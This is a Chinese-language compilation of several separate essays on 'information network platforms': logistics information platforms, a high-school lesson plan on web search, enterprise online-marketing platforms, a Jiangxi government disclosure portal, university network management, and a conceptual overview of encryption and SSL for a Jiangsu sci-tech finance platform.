许多平台借政府之力进入了商业领域,同时又借助政府之力进行不公平的竞争,许多企业打造的平台不是资源共享而是争抢客户。在戴会长看来,这都是企业非常反感的事情,也给企业带来很多麻烦。比如,很多地方政府打着监管的旗号要求车辆必须要加装GPS,而且必须在指定商家购买,否则不能通过安检等。此举在戴会长看来,权力、责任、利益不能对等,政府的职能只能以监管为主,不能随意而定。
有形之手博弈无形之手,在市场经济的条件下政府究竟应该扮演怎样的角色?对此,戴会长说,“政府如何去促进市场发挥配置资源的主渠道作用,而不是政府直接配置资源。这是当前改革的大方向问题,也是当前一件困难的事。”
发挥政府与企业两个优势
物流公共信息平台建设是借助政府的力量来构建,还是作为企业行为根据市场需求而构建?从商务部的例子来说,建立全国性的城市共同配送物流体系,自上而下地建立物流公共信息平台然后汇总形成合力,一番大兴土木之后,效果并不理想。
对此,戴定一认为,“政府的很多投资‘砸’在了信息平台,但成功的案例并不多见。即使是再往里‘砸钱’,仍然面临的可能还是失败。”
政府有政策和资金,企业有敏锐的市场嗅觉,那么,怎样发挥两者优势来构建物流公共信息平台呢?
对此,戴会长提议:“对公共平台体系的基础信息服务,包括商品的统一编码,车辆的统一排号,甚至电子车牌、电子驾驶员执照,集装箱、托盘等这些信息采集和监管等,政府做得还不到位。这些信息化服务,会给行业带来很大的方便,这就是基础建设,将来任何一个商业平台用起来都非常顺畅。这是政府应该做,甚至必须做的事情。”
为了实现安全的网上交易,物流公共信息平台必须提高准入的门槛,对入驻平台的物流企业、车主进行相关的认证,排除一部分信用差的企业,为平台营造一个诚信的交易环境的同时,还要建立信用的实时更新机制,建立平台物流企业的红黑榜,实时为客户进行预警,降低交易风险。除此之外,对于物流公共信息平台而言,要想真的实现交易低风险,必须建立交易保障金制度,对参与交易的企业进行有效地约束。
“把政府错装的手还给市场”,那么企业该如何做呢?唐山有些企业发起了“物流唐山项目”的“物流城市联盟”,这种企业自发组织的长处在于实现各地数据的互联互通和信息共享,以各地城市为节点,形成全国性的网络。用信息技术整合全国物流资源,构筑集成城市物流、城际物流多层服务的平台。不过,其效果如何?还需要时间的考验,我们拭目以待吧。
信息网络平台 篇5
一、基本说明
1模块:高中信息技术基础
2年级:高中一年级
3所用教材版本:上海科技教育出版社
4所属的章节:第二章第三节
5学时数:45分钟(机房授课)
二、教学设计
1、教学目标:了解网络信息检索的几种常用方法;掌握利用搜索引擎获取网络信息的策略与技巧;能够根据问题确定信息的需求与,并选择适当的方法获取信息。
2、内容分析:本课是《信息技术基础》(必修)第二章第三节的内容,旨在培养和提升学生获取网络信息的能力,使其成为每位学生在信息社会必须掌握的生存技能,并为学生学会有效组织和处理信息奠定基础,是学生继续学习和不断发展的不竭动力。本节强调通过体验和感悟网络信息活动中的操作与应用,培养学生掌握利用网络获取信息的过程和方法,为学生的学习、生活和发展提供服务。另外,本节还注意引导学生形成自主学习意识、与他人合作意识,也为必修模块的其他章节和各选修模块开展多元化交流与合作奠定基础。
3、学情分析:学生已有使用网络检索信息的感性经验,老师要结合学生原有的认知基础加以归纳提升,使学生形成多网络信息检索的理性认识,并在实践中不断总结积累自己利用网络检索信息的经验,不断提高自己的网络信息检索水平。但是学生之间的差异比较大,老师要注意营造交流学习的氛围。
4、设计思路:由问题“你知道有关中秋节的传说故事吗?”引出利用网络获取信息的学习任务,在学生交流探究并实践的基础上,让先查到的同学汇报自己的检索结果和所使用的方法,带动全班同学的学习积极性和学习兴趣,一起参与到课堂教学中来,师生一起用探究学习和交流学习的方式总结出常用网络信息搜索的方法。
在此基础上进一步引导学生学习常用信息检索方法——关键词查询法,掌握关键词的提炼和组合,然后通过抢答比赛让学生去体会和总结网络信息检索的策略与技巧。
中国的传统节日形式多样,内容丰富,是我们中华民族悠久历史文化的一个组成部分。最后让学生综合运用本节所掌握的网络信息检索策略与技巧全面了解中国重大传统节日的相关文化,以此来增进学生对传统文化的了解和继承。
三、教学过程
教学环节及时间
教师活动
学生活动
对学生学习过程的观察和考查及设计意图
创设情境问题引入
3’
播放不到一分钟的中秋送月饼的flash动画片,然后引出话题:农历八月十五日,是我国传统的中秋节,也是我国仅次于春节的第二大传统节日。那么你知道中秋节有哪些传说故事吗?
学生回答
激发学生兴趣,让学生很快进入信息技术的课堂氛围。
课程实施
37’
试
一
试
5’
组成员之间交流探讨,试一试如何利用因特网查询中秋节的传说故事?
老师巡回
老师带领大家总结出常用的网络信息检索方法:
1、目录检索
2、关键词查询
、学生小组探索。
2、先查到的同学汇报自己的检索结果和所使用的方法
根据学生的探索了解学生已有的网络信息检索水平
想
一
想
7’
以上两类信息搜索方法中我们平时用的最多的是哪一类方法?你知道为什么吗?这两种信息检索法有什么区别?
在学生归纳的基础上,老师总结出两种信息检索方法的特点:
查询方式
比较项目
分类检索服务网站
关键词查询服务网站
实现方式
分类目录
搜索引擎
操作方式
层层点击
输入关键词
优点
得到比较系统的信息
得到具体的信息
缺点
难以准确找到具体信息
不适合找到系统的信息
、学生回答。
2、学生归纳比较两种信息检索方法。
培养学生归纳总结能力。
赛
一
赛
9’
老师读完题目后,小组成员分别利用不同的网络信息检索方法查询问题答案,先查到的,举手示意,经老师同意后汇报自己的查询结果。
答对者,给所在小组加十分,抢答答错者(包括抢答不遵守规则者)扣十分,其他小组继续抢答。整个比赛结束时得分最高组为优胜组。
学生检索问题答案进行抢答。、结合活动开展,巩固信息检索方法的使用,利于学生掌握新知。
2、通过分组活动培养学生的团结协作精神。
想
一
想
7’
小组成员之间交流比赛过程中自己利用网络搜索信息的体会,想一想如何才能使用搜索引擎准确快速地找到自己需要的信息,并推举小组代表总结发言。
师生共同总结出搜索引擎的使用技巧:
1、关键词的选择最重要。
(1)提炼关键词
(2)组合关键词
用布尔运算符组合关键词:
AND或“+”、空格
oR或“|”
NoT或“-”
2、不要局限于一个搜索引擎。
3、强制检索的方法——加英文双引号。如查询谚语“raincatsanddogs”的汉语意思。加英文双引号可大大提高搜索的速度和准确率。
、小组交流。
2、推举代表总结。、培养学生探究学习的能力。
2、培养学生归纳总结能力。
练
一
练
9’
背景:
保护好属于中华民族的传统节日,是我们的一种责任!在我国已经延续了几千年的传统民间节日端午节,却于XX年被韩国抢先申报为该国文化遗产。在各种洋节日益盛行的今天,端午节等传统节日日渐式微。
中国的传统节日形式多样,内容丰富,是我们中华民族悠久历史文化的一个组成部分。
请结合小组抽到的信息检索题目,查查相关中国传统节日的来历、习俗、传说、诗词并与同学交流。
请推举小组代表介绍:
小组查询的是关于中国哪个传统节日的内容?
具体查询方法是:
查询结果如何?
学生根据抽到的题目进行信息检索。
通过该环节对中国各传统节日相关文化的搜索,来加强学生对民族文化的认识和继承,树立起对民族文化的珍惜与爱护之情。
拓展
1’
不管是从因特网获取信息还是从其他途径获取信息,必须保证获取信息的途径和方法是合法的,严禁不合法的信息获取行为——偷窃国家或单位机密信息;运用偷拍、窃听等手段侵犯他人隐私;使用威胁或黑客入侵手段等。
使学生知道在使用网络的过程中,应该遵纪守法,自觉抵制不良信息,负责任的参与信息实践,养成良好的网络道德行为和习惯。
总结
4’
让学生谈本节课的收获,老师补充。
学生一起回答
回顾本课,对所学作总结,学生再回忆一遍,加深印象
四、教学反思
采取这种主题活动式教学,对教师的要求更高。要想组织好一堂课,教师必须精心设计课堂,把活动安排得更细致,并要考虑周全。最重要的是要引起学生的极大兴趣,这就需要教师有非常好的引导,并在过程中给予学生帮助与指导。要有随机应变、驾驭课堂的能力,能调动气氛。当要各小组讨论时,要能及时调动学生积极参与,教师巡视时发现学生的闪光点及时进行肯定与表扬,进而带动整个课堂的气氛。课堂设定的评价机制要明确,活动要达成的目标要明确。
企业网络营销信息平台的探析 篇6
关键词:网络营销 信息平台 通信 网络
中图分类号:F274 文献标识码:A
文章编号:1004-4914(2012)09-274-03
引言
随着网络技术与经济的发展,网络作为一种有效方便的信息交流平台已被人们所接受。而网络营销是企业传统营销实践与现代通信技术、计算机网络技术相结合的产物,是企业以电子信息技术为基础的营销活动。企业网络营销活动包含了网络调研、网络新产品开发、网络促销、网络分销、网络服务等。过去在没有网络信息平台时企业靠着传统的手段方法来实现企业自己的经营目标,今天在传统的营销思想的指导下,网络营销作为新的营销模式为企业所追捧。网络营销这个随着网络发展而产生的企业营销方式,具有跨时空、交互性、个性化、虚拟性、高效性、经济性和整合性等显著特点。它的发展分为初级、中级、高级三个阶段,不同的企业根据自己的特点和实际情况选择不同的应用方式。一般来说,企业在网络营销业务里,借助网络的工具对企业的产品、品牌、企业形象、客服、销售渠道等方面开展工作。建立网络营销网站,利用网络平台和条件是企业开展网络营销的前提条件。企业如果采用网络营销平台可以让自己企业的名号、产品的情况及其企业的服务等内容在浩如烟海的企业与竞争的同行里脱颖而出,吸引众多的访问者使其成为自己企业的潜在客户。
一、企业网络营销信息平台的作用
那么,企业网络营销的信息平台主要完成什么任务呢?笔者根据多年对网络营销的学习和探索,认为网络营销平台主要做好6个方面的功能工作。一是企业内涵及企业文化的介绍。二是企业主要产品特征、性能及价格的介绍。三是产品的网络交易、电子支付、售后服务及在线客户交流等功能服务。四是企业产品的网络推广功能。树立企业的品牌形象,使更多的潜在客户知道企业的产品和服务功能。五是信息的收集、查询功能。包括企业组织的各种营销活动、企业同类产品市场介绍等功能。六是企业采购平台(内部使用)。企业采购人员可通过网络营销平台通过各种网络工具查询收集到最佳的采购信息,为节省产品成本,提高竞争力打下基础。
二、企业网络营销信息平台的功能与结构
企业网络营销平台的任务就是要完成企业的“营”和“销”的主要工作。从“营”上看主要的工作功能有:网络信息收集、网络市场调查、网络采购、网络客户服务等内容。从“销”上看主要的工作功能有:网站建立与维护、网络推广与网络广告、网络信息的发布、网络交易及电子支付、产品物流的组织等内容。要构建这个平台将平台划分6大功能模块:企业宣传模块,产品介绍及交易模块,信息查询、调查及收集模块,产品的推广模块,客户在线服务模块,企业内务管理系统模块。
1.企业宣传功能模块。企业宣传功能模块主要任务是让客户充分了解企业的基本情况。通过文字、图片、视频等手段把企业最光彩的一面展示给社会。其介绍主要内容包括:企业的基本情况、企业的管理机构、员工及主要负责人、企业的行业优势、企业的设备厂房、产品的制作流程和企业多年的工作成果等内容。此模块是告知型模块,客户访问观察后对企业有了一个初步的了解。
2.产品介绍交易功能模块。该模块主要完成企业的各类、各型号、各批次产品的基本介绍及电子商务的交易任务。客户通过查询得知企业各类产品的外观、性能、规格、功能、价格等信息。客户如对产品感兴趣可通过在线网络客服详细洽谈。此外本模块还具有网络接收订单、网络电子支付等电子商务交易功能。
3.信息查询、调查、收集功能模块。该模块完成客户的网络调查及信息收集功能。作为客户都有货比三家和了解同类产品的基本情况的心理,该模块可协助客户完成网络的调查、信息收集及比较工作。通过搜索引擎、关键字的搜索、网络链接等手段使客户较快的收集到所需的信息,客户也可发布网络调查问卷了解网民企业产品的客观反映。
4.产品推广功能模块。该模块为企业提供网络产品推广功能。在网络营销里网络推广是一个重要的环节,它为企业的营销人员提供各种网络推广的手段和平台。企业可通过该模块的各种功能实施产品的各种网络推广活动。主要有:电子邮件营销推广、网络微博文章营销推广、网络论坛营销推广、产品搜索引擎竞名推广、网络营销事件活动推广功能模块。企业可方便地使用平台进行各种网络推广的活动,使其声誉很快在网络里流传开来,从而引起广大网民消费者的关注。
5.客户在线服务功能模块。在线客服交互是客户体验企业良好服务和反映问题、解决困难的通道。也是企业收集客户意见、建议的渠道。客户的24小时在线不间断的服务、解决问题给客户温暖也给企业树立一个良好的形象。
6.企业内务服务功能模块。企业内务服务功能模块完成企业内管理人员、营销人员、采购人员或其他信息人员的业务信息查询、收集和整理任务。在企业里,特别是管理人员要做某项决策之前要在网络上收集大量的市场及产品信息。该模块可帮助他们获得最广泛、最及时和最有效的信息。此外,该模块也可为企业相关人员提供网络社会调查,得出一个客观有效的结论,为企业的决策和发展提供一个良好的辅助作用。
三、网络营销平台的技术实施
信息网络平台 篇7
关键词:政府信息,公开,平台建设
0 引言
在信息社会, 信息是最重要的财富, 谁拥有信息, 谁就掌握着主动权。政府信息从本质上来说是一种公共产品, 因此应该和其他公共财产一样为公众所共享。此外, 信息公开还关系到经济发展和政府廉洁等众多问题。政府信息公开是实现公民知情权的根本保障, 理解政府信息公开的内涵, 认识政府信息公开的必要性与重要性, 找准我国目前政府信息公开存在的问题, 无疑对建立我国政府信息公开制度具有现实借鉴和参考意义。
就江西省而言, 为了更好地服务公民、服务企业及涉外人员, 响应2007年1月17日国务院第165次常务会议通过的《中华人民共和国政府信息公开条例》, 省政府办公厅委托省信息中心在省网站开展更深入的政府信息公开工作。
所以, 为了实现信息公开平台, 发挥巨大的社会效益, 必须对各级部门的纸质资料及分散的电子版资料按照一定的规范进行梳理, 并采编发布到统一的平台中, 供公民通过网络轻松获取、使用。
1 政府信息公开平台建设的目标
1.1 网站建构现状
当前江西省政府信息填报方面, 没有数据加工处理的软件工具环境和与之相关的标准规范;在外网上, 公民无法对所需要的信息进行申请获取;门户网站方面, 不支持多站点的集群。因此, 系统构建所需的操作系统、数据库、网站发布管理等软件的采购、集成和功能开发, 以及网站的设计建造都是本项目建设的内容。
当前的门户主站点以及各级部门的网站, 都是依托自身技术力量或寻求不同的公司技术支持, 在不同的服务器上用不同的技术进行建构。彼此独立的特性, 不利于信息资料相关资源的共享, 易造成信息不对称、信息屏蔽、无法共享等弊端。
由于系统之间的彼此独立, 运用的数据库、应用表现技术都不一致, 也将造成功能拓展的障碍。各系统之间要建立协同的信息流转或信息共享时, 系统难以扩展相关功能。
1.2 建设目标
针对上述提到的问题, 信息公开平台建设的目标可分阶段建设如下:
第一阶段:省直各部门信息填报与依申请公开平台的建设, 此阶段是该项目的重要核心阶段。通过建构一个统一的各部门进行信息填报的平台, 对系统的内容信息、风格模板、用户权限、信息采编流程等进行统一、有效的管理。系统的相关管理人员, 可以通过该平台, 各单位的管理人员也可以通过该系统对有权限的栏目下的文件进行采编、审核和发布。而且在信息的采编过程中, 可以依托该统一平台, 进行各部门之间的信息交换、信息共享, 保证信息共享与数据交换。
第二阶段:省门户网站的建设, 可利用内容管理平台进行现有门户的改版、数据迁移、展现、功能改造, 进行多站点的创建、管理, 各级单位分权进行信息发布操作。
2 需求分析
2.1 对公共服务信息需求的分析
公共服务信息分为三类, 即:面向公民的服务信息、面向企业的服务信息、涉外服务信息, 如表一、表二、表三所示。
2.2 内外网专题站点应用需求分析
2.2.1 内网专题站点的构成
江西省政府内网专题门户, 要建成以污水处理专题为主的内部资源网站应用平台。主要是利用系统多站点功能, 将污水处理等专题独立成站点, 由专人负责维护、采编相关专题, 增加专题等。
2.2.2 外网专题站点实现方式
根据需要, 利用扩展字段, 将允许发布的文档条件分发到外网进行展现, 既满足了公网用户需要, 又满足了某些文档保密性的需要。
2.3 省门户对相关功能的需求
2.3.1 网上调查需求
应用TRSWCM的网上调查选件, 实现管理员可以自定义调查内容, 发布到网站上, 进行指定话题的投票调查, 实现公众与政府交互的需求。调查选件可实现的具体功能如下:
(1) 问卷名称、描述;是否方便添加、可否选择开放。
(2) 支持多个调查专题;支持一个调查专题中的多个事项 (问题) 。
(3) 支持单选、多选两种方式的投票;支持投票的时间段限制, 对IP的控制, 对是否允许重复投票的开关。
(4) 统计结果支持图形化 (柱状图、饼状图还是条状图) 表现。
(5) 投票结果可以查看投票时间、IP。
(6) 站点的管理人员可以方便地建立通过表单定制的方式, 建立包括单选、多选、单行文档、多行文本等方式的调查问卷。
2.3.2 网上建言献策、网上咨询等互动需求
网上建言献策、咨询等互动需求, 定制外网接收的页面, 包括姓名、联系电话、联系地址、附件等数据项。该需求将通过WCM提供的接口, 可进行自定义表单的设计, 实时提供网上互动常用服务。用户可以进行网上的咨询服务, 咨询内容将转入后台系统的指定栏目, 由栏目管理人员进行回复、公布。
2.3.3 新闻评论需求
应用TRSWCM的网上评论模块, 用户可以针对网站上的主题信息进行意见反馈, 评论的内容将转入后台系统, 由管理人员进行回复、公布。
2.4 数据应用需求分析
2.4.1 历史数据迁移需求分析
目前, 江西省政府旧门户采用的是网达系统, 为C/S模式, 数据库为SQL SERVER 2000, 原厂商没有提供任何数据字典及导出接口。针对现有的静态网页进行分析, 附件比较少, TRS将在项目实施过程中, 充分利用雷达采集的功能, 对旧有门户栏目信息, 对应WCM频道, 分步采集迁移导入新门户网站, 适当规避在没有数据字典的情况下分析大量表结构, 撰写程序导入的风险。
2.4.2 数据的备份恢复
(1) 备份管理
省门户网站涉及各个类型的大量数据以及多个应用系统, 包括大量的历史数据、应用数据等等, 必须有统一的备份管理措施以及备份管理方案。省门户网站备份对象包括:
①数据备份:包括TRS数据库的备份、重要文件的备份;主要涉及ORACLE数据库备份、WCM应用中附件图片、文档数据备份以及模板备份。
②网络备份:包括链路的冗余备份、网络设备的备份、服务器的备份、网络安全产品的备份, 确保各种基于网络的服务能够正常的使用和运行, 网络备份由硬件集成单位负责落实。
③应用备份:包括各种应用系统自身配置文件的备份, 各种应用服务器的备份, 包括WWW服务器、中间件服务器等等, 涉及TRSWCM、TRS WAS系统的备份工作。
(2) 恢复机制
在发生局部的灾难时, 省门户网站必须具有一定的自愈能力和快速切换能力, 保证日常工作的正常开展。恢复, 主要是要求能够及时发现异常, 并根据具体情况从备份数据中重新完成系统的启动, 尽量减少损失, 将灾难影响减到最小。相应的备份策略可以与系统、数据库集成商、TRS共同制定。
①网站数据库的灾难恢复
对省门户网站的重要数据库, 采用相应的技术使得数据库和备份系统数据保持一致。一旦灾难发生, 备份数据可以立刻恢复原有数据库, 保障整个网络的正常运行。
②网站应用系统的故障转移
对省门户网站的应用系统, 采用相应的技术 (如双机热备) 使得应用系统和被分系统数据保持一致。一旦灾难发生, 备份系统可以立刻接替原应用系统工作, 保障整个网络的正常运行。但针对目前省门户网站的软硬件配置情况, 建议定期对系统盘进行克隆备份, 对应用数据存储进行定期的磁盘备份。
3 系统部署
数据库服务器将以ORCLE10G存放网站内容采编的所有信息, 包括信息填报平台及门户站点。以TRS数据库存储各类按需导入的信息以供公众对网站的检索。
应用服务器将会部署TRSWCM内容协作平台作为网站内容采编、流转的应用平台, 为包括主网站以及所有子网站的系统管理人员、模板维护人员、信息采编人员提供一个协同工作的内容管理平台。
TRSWCM内容协作平台进行采编流转的信息, 将会以网页的形式传送到WEB服务器上, 以WEB服务器上的相关WEB SERVER, 如IIS、A-PACHE, 为公众提供信息浏览服务。
雷达采集、网关、TRS管理员工具可以部署在一台PC上, 对指定的站点或链接进行采集加工, 把结果存储到后台的TRS全文检索数据库中, 为资源库信息组织提供内容支持。
系统部署如图一所示。
参考文献
[1]王丽波.政府信息公开平台探讨——以住房和城乡建设部网站为例[J].中国建设信息, 2013, (10) :70-72.
[2]苏清.政府信息公开平台在电子政务中的作用——以河北省廊坊市电子政务建设为例[J].中国信息界, 2009, (09) :5-6.
浅析高校网络信息管理平台建设 篇8
关键词:高校,网络信息管理,平台建设
高等院校的信息化建设经历了系统集成、应用集成、信息集成和社会集成四个层次, 想打破应用系统之间的壁垒和摆脱结构化信息的困扰, 许多高等院校希望建立自己的站点 (Web Site) , 使校内外信息交流和资源共享。并且逐渐发展为高校网络信息管理平台。
1 高校网络信息管理平台的特点
信息是同数据、文档相比较而言, 信息更广, 而且还包含图形图像、Web页面和XML文件等。管理就是对上述信息的一系列处理过程, 而支撑内容管理的软件系统就是网络信息管理平台, 未来高校网络信息管理平台的发展具有以下特点:
1.1 信息访问渠道统一
把内部和外部比较分散的信息组合在一起变成一个统一的整体, 并且可以通过平台进行访问。
1.2 管理内容能力强大
网络信息管理平台与现有系统集成在一起, 使该系统平台能够支持几乎各种数据, 包括结构化和非结构化的;而且对多种关系型和OLAP数据库中的数据也能进行识别, 内容广泛, 管理能力强大。
1.3 信息共享和个性化服务
高校内部教职员工和拥有使有权限的人可以分享信息, 该平台可提供个性化的应用门户, 用户随时随地访问高校的信息和应用, 节省时间提高效率, 达到信息共享。
1.4 安全保障
为了保证数据的机密性和完整性, 使系统正常运转, 可以通过采取一系列的安全机制, 如认证、角色分配和用户操作监督等, 与B2B安全服务器建立安全通道等进行安全保护。
2 当前高校网络信息管理平台建设中存在的问题
当前高校网络信息管理平台的建设中存在的问题有以下三点:
2.1 查找资料难
由于学校的资料比较多, 即使上了网, 也散布在二级网站上, 大部分还没有上网, 使用时, 查找起来十分不方便。
2.2 水平较低, 存在安全问题
高校的二级网站由系、各部门自己建设, 水平较低、能力不同, 网站没有观赏性, 也存在安全漏洞。
2.3 应用软件杂乱
学校里用于网络的各种应用软件的数量和种类非常多, 也很杂乱, 严重影响了工作效率。为了更加系统化的管理信息, 建立高校网络信息管理平台势在必行。
3 高校网络信息管理平台设计和网络信息交换
3.1 高校网络信息管理平台设计
高校网络信息管理平台采用4层B/S (浏览器/服务器) 体系结构 (见下图) , 开发语言为JSP语言, 开发模式为JSP+Servlet+Jav Bean模式。用户使用浏览器即可轻松处理各种信息, 满足了用户的各种需求, 效率也得到提高。该平台具有信息共享、综合分析和决策支持功能。
然而实际上四层框架结构并没有真正实现, 多为两层:即前台信息浏览与后台信息管理。两层体系结构对软件开发信息的管理功能都能实现。
3.2 网络信息交换
高校网络信息管理系统中的各部门的信息交换是运用消息Hub结构来实现的, 利用网络消息的广播机制完成的。而且Hub结构上的网络信息交换容易被集中控制, 实现起来方便快捷, 并且逻辑性非常强。虽有缺点但也使高校网络信息平台的管理得到统一。
4 加强高校网络信息管理平台的安全管理
高校网络信息安全问题是一项复杂的、动态的、不断发展变化的工程。它要求高校必须树立网络安全意识, 通过计算机网络技术, 构筑全方位、多层次的管理监督安全体系。在系统建设初期就应做到以下几点:
4.1 建立入侵检测 (IDS) 和防御系统 (IPS)
入侵检测系统 (IDS) 实时监视网络系统的运行情况, 检测发现有攻击行为和攻击结果, 使高校网络信息资源的安全性和机密性得到保证。
入侵防御系统 (IPS) 是入侵防范系统, 在网络的进口或者出口处进行检测, 发现攻击问题会将攻击包丢掉, 使黑客的攻击无法进入。在高校网络信息管理中, 安装入侵检测和防御系统很有必要的。
4.2 使用邮件防病毒服务器
在服务器与防火墙之间安装邮件防病毒服务器, 可以进行检测因特网中的电子邮件, 所有来自因特网中电子邮件的带毒邮件都被采取提前设定的方法处理掉。
5 结论
随着计算机网络技术的发展, 随着教师、学生对相关信息需求的不断提高, 各高校应继续加强对高校网络信息管理平台的设计研究, 提高网络信息资源的利用率, 最终实现高校网络信息资源最有效管理。
参考文献
[1]魏雪.峰高校网络信息管理平台的研究[J].天中学刊, 2007 (10) .
[2]陈萍, 褚光辉.高校网络信息管理平台建设研究[J].高师理科学刊, 2008 (9) .
[3]马晓茹.高校网络信息管理平台的设计研究[J].科技风, 2009 (12) .
信息网络平台 篇9
1 影响网络安全的因素
2000年12月28日, 第九届全国人大会常委会第十九次会议通过《全国人民代表大会常务委员会关于维护互联网安全的决定》, 从行政的角度规范了对互联网的使用, 使得对互联网上违法行为有了明确的法律约束。但仅依靠这些还不足以让人们对网络安全充满信心, 魔高一尺, 道高一丈, 只有通过使用安全的网络硬件设备, 辅助以先进的计算机技术手段, 才可以从主观上阻止网络犯罪的发生。图1为网络安全涉及的多方面因素。
要想在互联网上安全地进行电子商务活动, 需要在网络上增加相应的安全措施。由自然因素导致的网络安全问题, 可通过增加设备和系统的可靠性, 加强数据的备份, 将损失降到最低;如果是人为因素导致的网络安全问题, 就得从数据安全角度入手, 通过相应的技术手段, 避免这种情况的发生, 如安装防火墙、加密数据、使用数字签名和身份认证等技术。本文着重从规避人为因素带来安全隐患的角度, 以目前正在投建的江苏省科技金融信息服务平台的安全运行为目标展开问题研究。
2 常用的网络安全保护技术与安全协议
2.1 防火墙
这是一种运用非常广泛和效果很好的选择。防火墙可以抵御网络中大部分的直接攻击威胁, 并且做出及时的响应, 将那些危险的连接和攻击行为隔绝在外, 从而降低网络的整体风险。防火墙的基本功能是对网络通信进行筛选、屏蔽以防止未授权的访问进出计算机网络, 概括地说就是对网络间的访问进行控制。
2.2 建立安全证书体系结构
这是目前比较流行和成熟的安全解决方案。数字安全证书提供了一种在网上验证身份的方式。我们可以使用数字签名技术, 保证信息是由签名者自己发送的, 签名者不能否认或者难以否认, 保证信息自签发到收到未曾作过任何修改, 签发的文件都是真实的文件。
保证电子商务安全最重要的一点就是使用加密技术对敏感信息加密。现在, 一些专用密钥加密和公钥加密可以用来保证电子商务的保密性、完整性和真实性。如果按照收发双方密钥是否相同来分类, 密钥加密技术可以分为对称密钥加密和非对称密钥加密两大类。
2.3 信息安全协议
目前主流应用有安全套接层 (SSL) 协议和安全电子交易 (SET) 协议, 此外还包括有电子数据交换 (EDI) 技术、良好隐私法 (PGP) 、安全超文本传输协议 (SHTTP) 、简单网络管理协议 (SNMP) 、虚拟专用网 (VPN) 等。
2.4 数字认证技术及授权
数字认证的主要作用是进行信息认证。信息认证的目的是为了确认信息发送者的身份及验证信息的完整性, 即确认信息在传送或存储过程中未被篡改过。利用数字证书技术进行网上安全传输数据的基本原理:首先传输双方互相交换证书, 验证彼此的身份;然后, 发送方利用证书中的公钥和自己的私钥对要传输的数据加密和签名, 这样即可保证只有合法的用户才能解密数据, 同时也保证了传输数据的真实性和不可否认性。为解决电子商务中交易和参与各方身份和资信的认定, 数据认证所采用的密码算法及技术保障均通过电子商务认证机构 (CA) 进行认证实现。
3 几种常用软件安全技术的实现
3.1 加密技术
3.1.1 DES (Data Encryption Standard) 算法
这是美国政府机关为了保护信息处理中的计算机数据而使用的一种加密方式, 是一种常规密码体制的密码算法, 目前已经广泛用于电子商务系统中。其特点:一个对称密码体制, 加密解密使用同一密钥、同一算法, 区别是加密子密钥的顺序是k1, k2, …, k16, 解密子密钥的顺序是k16, k15, …, k1。它在具体算法中属于分组乘法密码, 使用56位的密钥对64位的明文进行加解密, 获取的密文为64位。其中密钥的总长实为64位, 另外8位作为奇偶校验位。
3.1.2 RSA
这是一种公开密钥加密体系, 其理论基础是数论的欧拉函数, 安全性依据是求两个大素数乘积是计算上容易的, 但是分解大数的素因子是困难的。RSA算法的成功基于数论中大素数因数分解的难度, 若能从整数N分解出大素数P和Q, 便可以成功破译RSA系统。如果N达到100位 (十进制) 以上, 则目前的算法已不能在有效时间内破译RSA系统。
3.2 网络安全协议
3.2.1 PGP (Pretty Good Privacy)
这是目前最流行的一种加密软件, 它是一个基于RSA公钥加密体系的邮件加密软件。PGP不是完全的非对称加密体系, 它是个混合加密算法, 是由一个对称加密算法 (IDEA) 、一个非对称加密算法 (RSA) 、一个单向散列算法 (MD5) 以及一个随机数产生器 (从用户击键频率产生伪随机数序列的种子) 组成, 每种算法都是PGP不可分割的组成部分。
3.2.2 SSL (Secure socket layer)
SSL协议最初由Netscape企业发展, 现已成为网络用来鉴别网站和网页浏览者身份, 以及在浏览器使用者及网页服务器之间进行加密通讯的全球化标准, 是在传输通信协议 (TCP/IP) 上实现的一种安全协议。由于SSL技术已集成到所有主要的浏览器和WEB服务器程序中, 因此, 仅需安装数字证书或服务器证书就可以激活服务器功能。对于WEB信息传输通道的机密性及完整性, SSL是最佳的解决方案, 目前所有的浏览器和WEB服务器都支持SSL, 采用SSL在技术上已经很成熟, 互联网的安全敏感数据几乎都由SSL通道传输。SSL可以有效抵御通信量分析、主动攻击、重放攻击、密码组回滚攻击以及中间人攻击这五种常见的安全攻击的能力。
4 江苏省科技金融信息服务平台的安全框架设计
江苏省科技金融信息服务平台是在江苏省科学技术厅直接领导下, 由江苏省高新技术创业服务中心牵头组织实施的一个省级公共服务平台, 目前项目已得到国家科技计划立项支持。平台建设目标和宗旨是, 面向全省科技型企业和金融机构、创投机构, 集成科技企业、科技项目、科技人才、科技园区、科技平台、科技政策等优质资源, 促进金融、创投以及社会资本与科技型企业有效对接, 形成围绕政府科技投入、吸引金融信贷和鼓励创投跟进投入的多元化、多层次、多渠道的科技金融投融资体系, 为加快培育战略性新兴产业, 推动江苏创新发展和经济转型升级提供有力支撑。
目前平台已集成整合了来自省内多个科技计划管理系统的大量原始数据, 涉及上万家科技型企业的详细信息。尽管在平台实际应用过程中不涉及对原始数据的直接调用, 但是由于当前网络技术发展, 对于依托互联网络的数据应用过程本身就存在着大量的网络安全风险。基于对上述几种当前常用信息网络安全技术的分析与比较, 对江苏省科技金融信息服务平台的信息化网络安全提出基于加密和认证技术的策略想法。
为了验证策略的加密和认证的可行性, 在此以一个简化的应用框图示意 (见图2) 。
这一框图应用的重点不在于与实际平台现有的网络连接是否存在一一对应, 平台用户操作界面是否友好, 系统如何复杂等, 而主要着重于对整个操作过程中的安全性考虑。在这个WEB应用中, 有四个层面涉及安全性:
(1) 客户端到WEB服务器。这是整个应用中最危险的部分, 如何能够识别出要进入平台系统的是合法的用户还是非法的入侵者, 并且没有人能够窃取到用户与平台之间的通信内容, 即使客户端到WEB服务器的传输信息被截获, 也由于传输的信息本身是被加密过的 (针对客户端的用户名密码等登陆信息) 而不用担心其被泄露。本课题采用通过客户端认证来确定用户的身份。SSL技术的使用能够确保数据从客户端传到服务器端的保密性和完整性, 集成SSL的HTTP访问方式HTTPS已经得到广泛的应用。当系统的服务中注册了对于HTTPS的支持, 那么当访问URL是以https://开头的话, VM将自动地激活JAVA安全认证。在大多数以浏览器为客户端的情况下, 使用现有的支持SSL的WEB服务器更优于自己编写服务器程序。
(2) WEB服务器到中间件。考虑到扩展性和负载平衡, 中间件采用EJB模块设计, 通过RMI/IIOP机制访问, 当然为了避免在划分好网段的网络里面也不存在窃听行为, 我们也将引入集成SSL技术的RMI通讯机制, 保证数据的真实。同时, 本课题使用XML格式实现WEB服务器与中间件之间的数据传输, 通过XSD技术校验数据传输格式是否正确, 数据类型是否合法。数据在传输过程中, 敏感的数据将被加密, 所以即使WEB服务器到中间件的传输信息被截获, 信息的重要数据也不会被泄露。
